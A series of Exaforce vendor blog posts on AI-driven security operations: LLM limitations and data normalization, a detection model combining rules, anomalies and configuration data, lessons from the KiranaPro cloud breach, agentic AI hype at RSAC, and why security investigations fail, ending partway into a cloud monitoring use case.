Even though LLMs have the potential to finally solve the decades-old challenges in the SOC, their ability to generate statistically likely strings of text is only a small component of what would constitute an AI SOC. Being new, cool, and delivering on the AI mandate from the C-suites, LLMs have taken the limelight in the AI SOC. 

First, let us remember where LLMs shine:

  1. Their inference process mimics human-like reasoning in a text-based format, which can be used to substitute a human agent's actions
  2. Summarizing large amounts of hard-to-read data and translating it into human-understandable insights.

Both capabilities listed above are subject to the data being formatted in an LLM-friendly way, which is what we will address in this blog.

Why is the SOC a ripe area for automation using LLMs?

Unsurprisingly, these capabilities address the exact challenges for the current technology stack used in the SOC. Namely, analysts working with multiple tools to analyze multiple sources of data in order to manually investigate and respond to incidents. 

This is how we got the most quoted problems in the SOC - alert overload, consolidation of tools, and staff shortages. Tools such as SOAR have attempted to address issues around alert overload and staff shortages using deterministic automation. However, scripts and workflows are exclusively useful for the use cases they were designed for. LLM-based automation, however, is suitable for investigation and response without needing to pre-define logic.

For the consolidation of tools, efforts are typically around deploying security operations platforms, which have typically been SIEM providers which have acquired or natively developed UEBA, XDR, or SOAR. These are very high effort and high cost exercises, which are often prohibitive for most organizations. LLMs, with their natural language interface capabilities, can act as an overlay across disparate tools.

To leverage these LLM capabilities, it’s not enough to have a ChatGPT-like experience, i.e. use just one LLM to take in logs via a prompt submitted by an analyst. LLMs need to be architected as agents. The difference between an LLM and an agent has to do with the services wrapped around the LLM, which include memory, RAG, reasoning and chain-of-thought, output parsing and the like. Agents are then architected into multi-agents, which consists of one master agent or orchestrator which is responsible for coordination, and multiple purpose-built agents such as endpoint response agents, cloud log interpretation agents, and evaluation agents which assess the validity of outputs from other agents. With this architecture, LLM agents are well-suited to address the complexity, scale, and repetitive nature of SOC workflows.

Limitations of using LLMs in the SOC

However promising LLMs are for solving some of the SOC’s most pressing challenges, they are not without limitations, which include the following: 

  • Context degradation and forgetting - LLMs have finite context windows. As conversations grow longer or when processing large datasets, older information gets pushed out of the model's active memory. In the SOC investigations can involve analyzing weeks or months of logs. In those instances the LLM may "forget" earlier findings or context that must be used for accurate results. 
  • Multi-agent handoff loss of resolution - In multi-agent architectures, handoffs between agents represent a point of failure. Critical context, nuances, or intermediate findings may get filtered out or summarized away as data moves through the agent chain.
  • Model drift - The longer the output, the more likely it is to drift. As LLMs generate extended responses or analysis, they tend to gradually deviate from the original query or lose focus on the specific security context. This is particularly an issue with chatty LLMs which provide verbose answers. 
  • Time-series analysis - While LLMs excel at pattern recognition in text, they are not designed to handle numerical values and calculations. SOC work heavily relies on detecting statistical outliers or identifying subtle changes in user behavior over time. These tasks are better suited to specialized statistical models or machine learning algorithms, whose findings can then be fed into the AI agents.
  • Hallucinations - LLMs only produce the most likely string of text based on a prompt and context. There is no truth value associated with the prediction, which means that it can produce a likely but factually incorrect string. One hallucination can be carried over in the following responses. 

You may think that the above are limitations of LLMs altogether, but these are particularly important for SOC use cases, not just because of the sensitive nature and low tolerance for faults, but due to the security stack itself. Take IAM log sources for example, which may include Entra ID, Google Workspace, or Okta.

Entra ID

{
  "time": "2025-01-15T14:30:25.123Z",
  "operationName": "Sign-in activity",
  "category": "SignInLogs",
  "resultType": "Success",
  "userPrincipalName": "john.doe@company.com",
  "ipAddress": "203.0.113.100",
  "location": "New York, US"
}
Google Workspace

{
  "id": {"time": "2025-01-15T14:45:30.456Z", "uniqueQualifier": "abc123"},
  "actor": {"email": "jane.smith@company.com"},
  "events": [{"name": "login", "type": "login"}],
  "ipAddress": "198.51.100.25"
}
Okta

{
  "uuid": "def456-ghi789-jkl012",
  "published": "2025-01-15T15:00:45.789Z",
  "eventType": "user.session.start",
  "actor": {"alternateId": "bob.wilson@company.com"},
  "client": {"ipAddress": "192.0.2.50"},
  "outcome": {"result": "SUCCESS"}
}

Looking at the syntax for each log, it’s easy to see how the same event type has different fields and field names across various log sources. Interpreting this information would require a human, let alone AI, to understand the nuances of these events across each source, without which information can be interpreted incorrectly, leading to incorrect analysis. Without normalization and canonicalization of information, it becomes difficult to extract a consistent value for understanding threats and providing insights for investigations.

Pre-LLM data processing and analysis

We can give LLMs the best chance of producing accurate outputs through a smart end-to-end pipeline, from data ingest to the multi-agent architectures and post-LLM validation and evaluation.

The pre-LLM data processing layer is perhaps the most important one for circumventing the limitations listed above, particularly around hallucinations. This pre-LLM layer is often referred to as the semantic layer, which is responsible for transforming raw data into LLM-friendly formats. By LLM-friendly formats, we refer to consistent and explicit schemas across all sources. 

This is commonly done through normalization, deduplication, sanitization, and conversion of data, which will make, as an example, Entra ID, Google Workspace, and Okta logs read the same. An alternative option is to define explicit schema definitions for each data source which tells the LLM how the source is formatted and how to interpret it. 

Like time-series analysis mentioned above, behavioral analysis is not in the LLM’s wheelhouse, but it is a great candidate for the pre-LLM semantic layer. Established techniques such as statistical analysis, are often adopted in solutions such as UEBA, but the output is either another alert, or a simple deterministic automation script. In the AI SOC, these can be forwarded to an Agent for further investigation, interpretation, and validation.

The AI SOC must extend beyond the LLM

We’ve seen the inherent limitation of LLMs and how they cannot be the only component in an AI SOC.  Yes, they can perform sophisticated investigations at the level of human analysts in a fraction of the time, but they can only do it accurately if they are fed the right type of data in the right format, and if their output is evaluated and validated. 

As such, the data must be made not just machine-readable but human-interpretable. After all, LLMs are optimized to predict what a human would likely say next, not to establish truth from bits. The layer responsible for normalizing, deduplicating, enriching, and shaping logs into consistent semantic structures is not optional. It’s foundational. 

This semantic layer that renders fragmented, multi-source security data into a format that’s both logical and legible, gives LLMs the grounding they need to operate effectively and truly provide value in the SOC.

June 24, 2025

Detections done right: Threat detections require more than just rules and anomaly detection

Discover how Exaforce fuses logs, config & identity into an AI-powered graph that improves on legacy and naive detection techniques.

What does it take to do detections right, and why have we gotten it wrong for so long?

Detections were originally built using rules in real time on log data. In the mid-2010s, User and Entity Behavior Analytics (UEBA) products introduced sophisticated baselining and grouping techniques to identify outliers, focusing primarily on users and, occasionally, resources. For many mature SOC teams, these components of rules and anomalies are still the pillars of their detection architecture.

However, this approach leaves three critical gaps: 

  1. It cannot correlate findings with configuration (config) data
  2. It fails to account for unique cloud semantics
  3. It leaves context evaluation to a manual post-detection phase, which results in noisy individual detections instead of full incidents.

Incorporating configuration information

One element that both legacy approaches lack is the ability to correlate event data and historical data with config data. This piece of the puzzle is critical to ensuring that excessive false positives are not raised and to properly assess the impact of the alert. Today, most teams incorporate this data only post detection during the triage and analysis phase, and often this information has to be retrieved manually, and is difficult to parse. Moving the config analysis into the detection logic itself can make detections more accurate and help your teams operate the most efficiently. This config data can include:

  • Blast radius assessment: This user may be compromised, but what resources can they access? This is not easy. In some environments, such as AWS, assessing this requires a full chain of identity analysis of which roles can assume what other roles, each of which can access which resources. Without this full analysis, there can be false positives for what the true access the identity has.
  • Proper severity assessment: This EC2 instance is acting anomalously, and its attached instance profile has admin permissions, which may be extra risky.
  • False positive recognition: Using effective permission analysis, we can tell that this user was suddenly granted a very permissive role, but the sensitive assets have resource policies that override the role granted, so it’s actually benign and shouldn’t create an alert.

Attempts to incorporate config data into detections themselves have been made. Many products offer features such as user or entity frameworks, tags, and HR integrations to try and bring aspects of this data into the detection fold. However, maintaining those integrations and updates, and covering the breadth of config data in the model, is extremely time-consuming and difficult, and as such, many teams have resorted to moving the config analysis to the post-detection phase.

Built for cloud & SaaS

UEBA has its origins in the insider threat use case. It was primarily built for identities and modeling their typical activities/patterns. As the approach proved fruitful, many expanded to model some resources as well, often individual virtual machines (VMs) or instances. However, with the shift to IaaS and SaaS environments that many are embarking on, the notion of UEBA needs a major reset. Cloud resources are often ephemeral, leading to different scaling requirements and a new approach to baselining and anomaly detection. The variety of IaaS and SaaS resources - from Kubernetes workloads and pods, GitHub repositories and actions, to Google documents - all require very different modeling. Even the traditional identity is not as straightforward. Roles in AWS, for example, may be assumed by a mix of humans and machines, making their modeling far more complex. In some AWS cases, the alert may not even be attributable to an origin identity, only to the role used. As a result, the traditional UEBA tools and features often fall short of the needs of modern organizations that operate in cloud and multicloud environments. 

Detections are not incidents

The job of the detection tool is not just to provide a hint of suspicious activity but also to ensure that the alert is framed in the full context of the environment. Examples include auto-grouping duplicate alerts and incorporating business context during events such as reorganizations, mergers, or new tool rollouts. The ability for the detection tool to accommodate such context is critical to ensuring analyst expediency and completeness of investigation, as it greatly reduces the noisy individual detections and transforms them into well-documented incidents. Very pointed tools often put a burden on a Security Information and Event Management (SIEM), Security Orchestration, Automation, and Response (SOAR), or other system to do a second level of correlation, aggregation, and analysis to perform some of these steps, making maintenance of this system cumbersome and manual.

At Exaforce, effective detection is a well-balanced triad of rules, anomalies, and config data purpose-built for the modern cloud and SaaS centric company. Here's how our approach breaks from tradition and why that matters. 

In the next few sections, we’ll explore how Exaforce overcomes these limitations in current solutions with a fresh, AI-powered approach to data ingestion and modeling. By fusing log, config, and identity data into a unified semantic layer, and then layering behavioral baselines and knowledge-driven reasoning on top, Exaforce converts scattered signals into precise, high-fidelity alerts that reveal complete attack chains rather than isolated anomalies.

The Semantic Data Model

Ensuring quality data

Our approach to detection begins with Exaforce’s three-model architecture: the Semantic Data, Behavioral, and Knowledge models. Each adds a distinct layer of context.

We ingest event and config data from various sources and convert them into structured Events and Resources. Events are organized into Sessions to add perspective and contextual signals such as location, Autonomous System Numbers (ASN), and duration at a session level. We also chain sessions to capture origin identities, role assumptions, cross-role behavior, and action sequences that enable more complete analysis of what was done and by whom. This preps the data for the detection assessments to come. 

Resources undergo similar treatment. We capture config, parse resource types, enrich the resources, and build relationship graphs. Exaforce also collects config changes over time, enabling us to detect subtle but critical changes that would otherwise go unnoticed. It also empowers us to assess the impact of each config change, effectively conducting a full blast radius analysis. Identities, a key subset of resources, receive extra enrichment, for example:

  • Human vs. machine classification: Exaforce’s model analyzes identity types, behavior patterns, and role assumption patterns to classify identities as humans or machines. This classification is dynamic to allow for complex scenarios (e.g., cases in which a new identity is created by a human but then used in a script executed by a machine identity, or roles which are shared by both human and machine identities). As an identity’s human vs machine classification changes, so will the way they are enriched and modeled. 
  • Effective permission analysis: Interpret the full range of permissions the user has based on transitive role assumption capabilities and overlay them with resource policy information. 
    • Identity chaining: Which identity actually performed this action, not just which role was used
    • Reachable resource analysis: which resources can this identity access, with what actions, and access level
  • 3rd-party identities/access: Identify third-party identities and monitor their behavior and privileges more carefully. 

Resources in our context are a generic construct. They could be anything from AWS EC2 instances, Kubernetes Jobs, GitHub repositories, to Okta roles. This modeling of the config from the outset allows for a more complete detection to be formed and provides the foundation for the first pillar: configuration.

The Behavioral Model

In Exaforce, any dimension that could be anomalous is referred to as a Signal, for example, an unusual location or rare service usage. Signals may be weak or strong, but both are important. Detections are generated by grouping signals that occur in the same event or session, representing collections of medium-fidelity anomalies. These signals and detections provide the rule and anomaly pillars of the solution.

The Semantic Model sets the data up to be modeled in the Behavioral Model. Sessionizing events, for example, allows us to go beyond baseline individual actions to baseline combinations of events and event patterns. Similarly, baselines are customized to the object in question; for example, humans and machines (identified in the aforementioned Semantic Data Model) are modeled differently. Machines tend to follow predictable patterns, while humans are far more eclectic. Shared identities, such as a role used by both an engineer and automation scripts, are modeled with this nuance in mind. 

We model a wide range of signals, independently and in combination, including:

  • Action (and action patterns)
  • Service
  • Time 
  • Duration
  • Location and ASN (including cross-source comparisons)
  • Resource

Here’s an example of an Exaforce finding with multiple signals. In this example, we saw both an Operation Anomaly and a Service Usage anomaly. This user, Mallam, does not usually perform this GetSecretValue action, and they do not typically perform actions in the AWS US East 2 region. This led Exaforce to fire a detection. 

A contextualized threat finding bringing together an action with past behavior.
Additional event data and signals brought together into a unified finding.

This multidimensional approach is critical: a single weak signal is rarely enough, but several weak signals, together, often are. This rule and anomaly detection approach across the breadth of resources and log sources supported represent two pillars in the detection trio. 

The Knowledge Model

The goal of detections is completeness to make sure no signal of potential compromise is overlooked. But completeness can result in noise. That’s where our Knowledge Model comes in. 

After the semantic data model runs and signals fire, and are grouped into detections, Exaforce runs a triage pipeline that contextualizes the detection and adds organization-specific business context to turn medium fidelity detections into high fidelity findings. This triage process is performed on Exaforce and 3rd party alerts alike and helps augment context even further to ensure we truly only surface alerts worthy of analyst attention. This analysis includes weighing conflicting factors in context and occurs at the end of the detection stage. For example, it could include weighing the fact that the user has broad privileges, with the severity of the action taken.

The weighing of resource/identity config data with rule and anomaly outputs happens in this knowledge model and is supplemented by the additional context around similar findings, business context provided by the user, user/manager validation responses, etc. 

  • Similar Findings are identified. If closed, their resolutions are used as inputs to the model to assess this finding. If they are still open or in progress, the model will group them. Once grouped, the findings will be classified as duplicate, grouped, or chained to specify the relationship and level of related analysis. 
  • Business context rules allow users a mechanism to input free-form data into the model. This could include context about the environment - eg these resources are very important, or we use this VPN, they could include information about users - users A, B, C are all part of the Executive Team team and should be monitored carefully, or general context about the company - eg we are a Health company with offices in the following locations, and often have teams commuting between these sites. This freeform input allows novice users to influence and inform the Exabots about critical context without manually having to silence or suppress individual alerts. 
  • Exabots also have skills that allow them to seek validation from end users. If the Exabot determines that a user validation or manager validation would be helpful, it can trigger a Slack/Teams message to the individual and use their response as an influence on the determination.  

The Exabots curate this set of information and pass it to the Knowledge Model agents to assess each of these factors and make a determination of “False Positive” or “Needs Investigation,” turning basic Detections into context-rich Incidents. All of these analyses are run continuously while the alert is open or in progress, so even as your environment changes, your recommended assessments stay up to date. Note that the preparation, structuring, and condensing of this data helps ensure that the AI agents performing the analysis are the most accurate and minimizes hallucinations. 

Running the initial knowledge model before presenting the detection to the user allows the Exaforce detections to be extremely high fidelity.

Example

The user here was seen in two locations, Zurich and Matran, in quick succession. This quick mid-session location switch was anomalous, but the locations themselves were actually consistent with the user's previous behavior and consistent with other company employees as well. The actions performed were also consistent with historical behavior for this user. Therefore, the triage agent was able to weight the anomalous action against the other factors and rule this a false positive. You'll note that the triage agent is also armed with company-specific business context - In this example, it refers to an office in Zurich. (More about business context and triage in our next blog!) 

An automatically marked false positive of a user accessing a repository from multiple locations based on business context.

After triage, we group findings, both Exaforce and third-party, into aggregated attack chains. This lets analysts see the full picture, not just disconnected events.

Exaforce in action: GitHub example

Let’s see the Exaforce approach in practice.

GitHub is a critical data source. It contains sensitive data such as company intellectual property and can even have attached secrets that are highly permissive to perform CI/CD actions. However, it’s often overlooked.

Exaforce ingests logs and config data to gather activity information and identify risks and threats associated with supply chain attacks. For example, uses of Personal Access Tokens (PATs), the credentials commonly used in CI/CD and developer workflows. Out of the box, GitHub logs provide hashed PATs and basic attribution. Exaforce goes further. In this example, the Semantic Data Model 

  • Ingests log and config data, and sessionizes it to understand resources such as the repositories, workloads, actions, tokens, etc. 
  • Enriches the token resource with scope information for the token from the config data to understand access and permissions. This involves correlating the token’s scope information from the config information with runtime data containing the hashed token in the logs. 
  • Classifies tokens used for cron jobs, ad-hoc scripts, and user-driven actions based on their historical usage

Instead of simply attributing actions to a user, the behavioral model then also builds tailored baselines for the tokens themselves and generates signals for any anomalies found. PAT-based baselines allow for a variety of unique detections and protections. Users may have multiple PATs in use simultaneously for a mix of automation and ad hoc usage. Distinguished baselines per PAT allow us to avoid firing false positive detections where both are in use concurrently. 

Here, we identified 6 types of anomalies (signals), most critically, a new repository being accessed from a new ASN.

A threat identified with a user making code changes with multiple locations and ASNs, contextualized with configuration data (lacking branch protection rules).

The Knowledge Model weighed these anomalies against the PAT’s scopes to determine alert severity.

Multiple event signals correlated with configuration data culminating in a single alert with a dynamic severity.

The traditional detection pillars were powerful in finding things but lacked context, creating noisy alerts without enough detail to paint a full picture. Exaforce delivers high-fidelity findings by starting with strong foundations: a semantic data model that structures raw IaaS and SaaS data into enriched, contextual entities.

We monitor a wide range of signals across actions, identities, sessions, and more to detect even minor deviations that add up to real alerts. Our bespoke modeling ensures deep coverage across both IaaS and SaaS environments, including overlooked systems like GitHub and Google Workspace.

Signals are aggregated into cohesive, cross-dimensional findings, and our triage agents weigh conflicting anomalies to surface only what truly matters.

The result? Comprehensive coverage, smarter triage, and dramatically fewer false positives.

June 10, 2025

The KiranaPro breach: A wake-up call for cloud threat monitoring

Practical takeaways and best practices in the aftermath of the KiranaPro breach.

The KiranaPro breach: A wake-up call for cloud threat monitoring

The breach at KiranaPro, an Indian grocery delivery startup, underscores a widespread misconception: that cloud-provider controls alone are sufficient. After attackers gained access through a former employee’s account, they deleted KiranaPro’s entire AWS and GitHub infrastructure—wiping out code, data, and operations. The incident highlights a dangerous gap in how organizations monitor SaaS and IaaS environments.

A deeper look at the KiranaPro incident

On May 26, 2025, KiranaPro’s entire cloud infrastructure was wiped out by hackers who exploited credentials from a former employee. Despite the startup’s use of standard security measures, including multi-factor authentication, attackers managed to bypass these safeguards. The damage included deletion of sensitive customer data, operational code, and critical cloud resources. The root issue was not a weakness in AWS or GitHub, but rather gaps in KiranaPro’s own security practices, specifically inadequate user access management and a lack of proactive monitoring for abnormal activity.

Cloud providers aren’t watching your accounts

Many organizations mistakenly believe cloud providers handle comprehensive security. In reality, cloud providers employ a “shared responsibility model”: providers secure the underlying infrastructure, while customers secure their data, accounts, and access policies. KiranaPro’s breach vividly demonstrates the risks organizations face when they misunderstand or neglect their side of this shared responsibility.

Built-in security tools from SaaS and IaaS providers are robust, but they typically focus on static defenses and configuration checks. They rarely detect real-time threats like credential misuse or unauthorized account activity—issues central to the KiranaPro breach.

Threats aren’t just insiders 

While insider threats (e.g., former or disgruntled employees) pose a significant risk, proactive threat monitoring is essential across multiple attack vectors. External attackers frequently exploit stolen credentials, phishing attacks, misconfigurations, and weak API security. Organizations must recognize that threats come from multiple directions simultaneously.

Proactive threat monitoring involves continuously analyzing cloud activities in real-time to spot anomalies—such as logins from unexpected locations, abrupt permission changes, or unusual data deletions—and taking immediate, automated action to contain threats. Some organizations use SIEM rules to detect these patterns. Others adopt platforms that deliver out-of-the-box monitoring across SaaS and IaaS environments.

Practical takeaways from KiranaPro

The KiranaPro breach underscores the importance of continuous vigilance in cloud security. Organizations cannot afford to adopt a passive stance:

  • Strict access controls: Access to critical systems should be restricted to only those who absolutely need it, following the principle of least privilege. Over-permissioned accounts increase the impact of any compromise or misuse. Privileged actions should be tightly scoped, and administrative access should be granted only when required and revoked when not in use.
  • Avoid persistent IAM credentials: Long-lived credentials—especially for privileged IAM users or root accounts—create enduring risk. Instead, use short-lived, automatically rotated credentials issued via identity federation (e.g., IAM roles with SSO) or just-in-time access. This approach reduces exposure, improves auditability, and makes it easier to manage access at scale.
  • Systematic offboarding: Any IAM user accounts or long-term credentials associated with former employees must be revoked immediately. However, simply deleting these credentials can break production systems, so it’s critical to understand their usage beforehand. Having visibility into actual credential usage and mapping dependencies is therefore essential for secure offboarding.
  • Change control via CI systems: All changes to production environments should be enforced through controlled CI/CD pipelines with mandatory approvals. This discipline adds a valuable layer of oversight and would have likely caught or prevented a destructive action like a mass deletion. While idealistic, it’s a proven safeguard that mature cloud teams should strive toward.
  • Disaster recovery and backups: No system is immune to compromise. Having a disaster recovery plan—including infrastructure-as-code templates and tested, restorable backups—can make the difference between downtime and a total shutdown. KiranaPro’s inability to quickly recover infrastructure suggests major gaps in their resilience planning.
  • Proactive monitoring: Investing in active threat monitoring solutions ensures real-time visibility into system activities, significantly enhancing the ability to detect and mitigate potential security threats swiftly.

Additional best practices from the field

In our previous blog, “Bridging the Cloud Security Gap: Real-World Use Cases for Threat Monitoring,” we examined common cloud security anti-patterns and offered actionable guidance to continuously monitor, detect, and effectively respond to emerging threats.

One highlighted use case involved a device manufacturing company relying on a single IAM user with long-term credentials accessed from multiple locations. This setup amplified risk due to varied operating systems and environments. To mitigate this type of risk, additional recommendations from our best practices blog include:

  • IP Allow-Listing: Defining and enforcing an allowed list of IP addresses for each location.
  • Resource Access Monitoring: Continuously monitoring and logging which resources the IAM user accesses.
  • User Agent and Device Validation: Identifying and allowing only predefined user agents and flagging anomalies.

These measures are also applicable to preventing cloud breaches like the one experienced by KiranaPro.

Conclusion

The KiranaPro breach is a reminder that cloud security requires ongoing, active vigilance. Organizations should move beyond relying solely on provider-native tools and adopt continuous threat monitoring as a foundational security practice. By clearly understanding their security responsibilities, implementing robust access governance, and monitoring cloud activities proactively, companies can significantly reduce their vulnerability to breaches and maintain operational resilience.

Need help building real-time visibility across your cloud stack? Exaforce provides AI-driven threat monitoring across IaaS and SaaS environments such as AWS IaaS, GCP IaaS, Github, Okta, AWS Bedrock, Google Workspace etc. that allows you to expand your threat coverage to your cloud services without writing and maintaining rules. Contact us to request a demo. 

May 29, 2025

3 points missing from agentic AI conversations at RSAC

Agentic AI tools for security operations centers promise to enhance—not replace—human analysts, but their true value lies in thoughtful integration, deep context, and rigorous proof-of-concept testing, not hype-driven adoption.

This article originally appeared in SC Magazine.

For those who attended RSAC 2025 this year, chances are agentic AI came up in the conversation. Vendors pushed dozens of agentic AI products, many of which were tailored to use cases for security operations centers (SOCs) – and marketers dove in head-first to position their companies at the forefront of innovation.

However, thoughtful dialogue about the practical application and true value of agentic AI in the SOC got lost. Here’s what many of the sales pitches missed:

Agentic SOC platforms are a force multiplier, not a replacer.

One of the biggest misconceptions about agentic SOC solutions that we heard is that they will put security professionals out of work and replace some of the tools they’re most familiar with, such as security incident and event management (SIEM) tools. That’s not accurate - in fact, humans, SIEMs and agentic SOC solutions work better when used in tandem.

Security professionals benefit from using effective agentic SOC tools. The new products can minimize tedious workloads, time spent triaging alerts and performing investigations will decrease substantially, and they’ll have more time to uplevel and focus on high-tier investigations and response tasks.

SIEMs have been around for decades and aren’t going anywhere. They collect large amounts of historical data and context that agentic SOC solutions can rely on to produce recommendations and responses. While some agentic SOC tools add reasoning and action to datapoints, they need access to the context in the SIEMs to remain effective.

Context too often gets overlooked.

An overlooked aspect of agentic AI that has gotten lost in conversations about minimizing workloads is its ability to work in tandem with third-party systems. These third-party tools and data sources have nuanced interfaces, data schemas, and operations that agents can misinterpret without deep contextual knowledge of how a tool works. AI agents need deep integration, with sufficient access to data, visibility into workflows, strong feedback mechanisms and environmental context.

If the enabling deep context gets overlooked, agentic AI tooling can add tasks to a to-do list, rather than removing them. For example, if the solution triages an alert and offers a recommendation, is there transparency on that data was gathered? Do we have to go through another system to get the transparency on that data? Is that adding work for the team? The level of context and importance of automating fine-tuning after deployment are still aspects that are being overlooked.

The vendors don’t offer PoCs that can prove a product’s real value.

Crowded booths and flashy banners were everywhere, but booth demos are optimized to tease the best functionality the vendor has to offer – they can’t deliver the insights that deploying the product in the user’s own environment can elicit.

Vendor claims for agentic AI SOC tools ranged from saving time and money to agents making decisions and executing on them autonomously. A proof of concept (PoC) can help verify whether those claims hold up under the company’s SOC’s conditions. Can the tool operate with the company’s specific data volumes and alert types? Can they integrate with the tools in the tech stack that are crucial to the organization’s business operations?

Many may think: “PoCs are nothing new – we know there’s value.” True, but the misconception that AI agents will replace security professionals in combination with the current economic climate adds concerns that we can quell with a PoC in favor of a paper evaluation. Giving analysts the opportunity to test the product and see that it’s there to help them, not replace them, will go a long way in building trust between the user and the product, as well as the employee and the investment decision-makers.

Getting a PoC and fighting the urge to make a heavy investment immediately for the sake of quick innovation lets a team fine-tune the tool’s logic, policies and thresholds to match a SOC’s risk appetite and operational nuances.

So with any new technology, we’re bound to have a hype cycle that spin up fluff. To find the true value of a new product, take it for a test drive and hold it to a high standard to deliver on its promises. Make sure the outcomes are accurate, the sources transparent, the data immediately accessible, that it complements the operations of the teams and tools that are crucial to the success of the organization.

May 27, 2025

5 reasons why security investigations are broken - and how Exaforce fixes them

Struggling with alert overload or slow triage? Discover 5 reasons security investigations fail—and how Exaforce uses AI to fix them fast.

Security investigations have been broken for years. The problems are nothing new: 

  • Alerts without context that leave analysts scouring to gather all the relevant data
  • Gaps in cloud knowledge - analysts are forced to triage issues they don't have expertise in
  • Slow, cumbersome, investigations that can take hours
  • Lack of expertise in system nuances like advanced querying, log parsing, etc. 
  • Overwhelming alert volumes that cause fatigue and mistakes

Every SOC team has felt the pain. What’s changed is the scale and complexity of the environments we defend—cloud-native architectures, third-party SaaS sprawl, identity complexity, and constantly evolving threats. The tradition of static rules, dashboards, prebuilt playbooks, and SIEM queries simply can’t keep up.

At Exaforce, we’re building a new way forward.

We combine AI bots (called “Exabots”)  with advanced data exploration to make security operations faster, smarter, and radically more scalable. Our platform understands your cloud and SaaS environments at a behavioral level—connecting logs, configs, identities, and activities into a unified, contextual graph. From there, our task-specific Exabots take over, autonomously triaging alerts, answering investigation questions, and threat hunting—with accuracy and evidence.

The result? Clear explanations, actionable insights, and fewer hours wasted digging through logs or waiting on other teams.

In the following sections, we review the five main reasons investigations are still broken—and how Exaforce solves those issues for the SOC.

1. Not enough context: “What even is this alert?”

Most alerts land in your SIEM with minimal templated explanations. Why did it fire? What does it mean? What’s the potential impact? Ideally, every alert would come with a detailed description, evidence, and an investigation runbook. In reality, most teams never have the time to write or maintain this. Even anomaly alerts often fall short—showing raw logs instead of a clear comparison to expected behavior. For example AWS GuardDuty alerts show up with generic terms like “unusual” and “differ from the established baseline”. They do not contain detailed information to help analyze or confirm, and understanding what the abnormal behavior was, or what was normal inevitably requires additional data and lookups. 

A sample GuardDuty finding with minimal information about the nature of the suspicous and unusual activity.
The same finding after the Exaforce enrichment, analyzed on multiple dimensions that clearly articulate the anomalies.

The Exaforce Approach:

  • Every alert—ours or third-party—comes with an explanation of why it fired. In “easy mode” english for quick understanding, and in “hard mode” with full data details for those who want to go deep.
  • Data supporting the conclusion is shown clearly—so you have concrete evidence.
  • Alerts are enriched automatically with data from multiple sources—no SOAR playbook required.
  • All findings include “next steps” to kickstart the investigation or remediation.
  • Similar and duplicate alerts are grouped out-of-the-box to prevent redundant effort.

Whether you’re skimming or scrutinizing, Exaforce gives you the context you need to move with confidence.

2. Lack of cloud knowledge: “We’re a SOC, not cloud ops.”

Most SOC analysts come from network security backgrounds. Now they’re expected to triage cloud alerts involving IAM chains, misconfigured S3 buckets, and GitHub permissions. Meanwhile, the actual cloud or DevOps teams often live in a different org entirely, making collaboration slow and awkward. Eg not sure why user A was able to perform a risky action? Not familiar with how AWS identity chaining works? No problem - we summarize the effective permissions a user has, and if you want the details - show you the full identity chain of how they got them.

An example of permission analysis done by Exaforce. All the user's roles and their usage are presented, as well as a view of the effective permissions.
An example of the visual layout of a user's permissions from their IDP through the various AWS services they can access, traversing the complex identity and permission management structure.

The Exaforce Approach:

  • Exabot acts as your built-in AI cloud expert—explaining alerts in natural language.
  • Works across cloud and SaaS sources like AWS, GCP, Okta, GitHub, GoogleWorkspace, and more.
  • For deeper dives, the investigate tab provides full technical context—ideal for handing off to DevOps or engineering.
  • Our semantic graph view shows how users, roles, and resources connect—so analysts can understand identity behaviors visually, not just textually.

We bridge the cloud knowledge gap—  translating cloud complexity into clarity.

3. Time to investigate: Attacks are quick, investigations aren’t.

Investigating a single alert can take hours—jumping between consoles, writing queries, checking with senior analysts, and gathering context from different systems. Now multiply that by the volume of daily alerts, and investigation becomes the biggest bottleneck in your entire response pipeline.

The Exaforce Approach:

  • Exabot handles triage in under 5 minutes, using semantic context to reach conclusions with supporting evidence.
  • And if you have questions? Just ask Exabot—no Slack messages, no dashboards to build, no delays.
The queue of findings. Many have already been marked false positive.
A view inside the activity of an Exaforce finding - finding created and promptly analyzed, analyst asked a question and bot responded immediately with a robust response.

We cut investigation time down from hours to minutes—without cutting corners.

4. Lack of expertise: You shouldn’t need to be a SQL ninja.

Investigations traditionally require deep knowledge: what logs to look at, how they’re structured, what’s “normal,” and how to ask the right questions in the right query language. Most junior analysts just don’t have that expertise—and most teams don’t have the documentation to help.  

 The Exaforce Approach:

  • Exabot answers complex questions in plain language—no syntax required.
  • Want details? Every alert comes with a bespoke investigation canvas—pre-loaded with all the questions an analyst would ask, and data heavy answers for each one. 
  • Our semantic data model pre-enriches and structures log data so analysts see what matters, when it matters. You get enriched, joined, cleaned, and contextualized data out of the box. 
  • We surface behavioral baselines, patterns, and ownership insights that usually live in tribal knowledge.

Even this common AWS GuardDuty alert for unusual behavior requires an analyst to - understand who the root identity is, query for other logs in the same time period, parse those logs for a unique list of resources touched, extend the query to include other users on the same resources to establish a baseline, and build statistical analysis to understand 'normal' behavior for the user, action, location, and resource. But not with Exaforce: 

The detailed Exaforce investigation canvas supporting the recommendation. Note the Q&A style with supporting data.

Now anyone on the team can investigate like a pro—without mastering a query language, managing log parsers, or building custom dashboards.

5. Too many alerts: Welcome to burnout city.

Your team gets thousands of alerts and most of them false positives (85%+). Analysts get desensitized, threat signals get missed, and triage becomes a box-checking exercise instead of a security process. (A great analysis on the alert fatigue problem by security guru Anton Chuvakin: https://medium.com/anton-on-security/antons-alert-fatigue-the-study-0ac0e6f5621c)

 The Exaforce Approach:

  • Exaforce automatically triages the majority of alerts.
  • Duplicate and related alerts are grouped together so they can be handled once.
  • Analysts only focus on the high-signal, high-impact findings that actually require human insight.
A grouped Exaforce finding. Findings from github and aws are aggregated into a larger finding with a higher severity.

We cut the noise, so your team can spend less time firefighting and more time securing.

Final Thoughts: Investigations, Reimagined

The problems aren’t new. But the solution is.

With Exaforce, you get a better approach to investigation—powered by intelligent bots, and an advanced data interface that is intuitive, visual, and conversation.

May 7, 2025

Bridging the Cloud Security Gap: Real-World Use Cases for Threat Monitoring

At Exaforce, as we work with our initial set of design partners to reduce the human burden on SOC teams, we’re gaining valuable insights into current cloud usage patterns that reveal a larger and more dynamic threat surface. While many organizations invest in robust security tools like CSPM, SIEM, and SOAR, these solutions often miss the nuances of evolving behaviors and real-time threats. This blog examines common cloud security anti-patterns and offers actionable guidance, including practical remediation measures, to continuously monitor, detect, and effectively respond to emerging threats.

Use Case: Single IAM User With Long Term Credentials Accessed From Multiple Locations

A device manufacturing company relies on a single IAM user with long term credentials for various tasks such as device testing, telemetry collection, and metrics gathering across multiple factories in different geographic regions. This consolidated identity is used from varied operating systems (e.g., Linux, Windows) and environments, which amplifies risk.

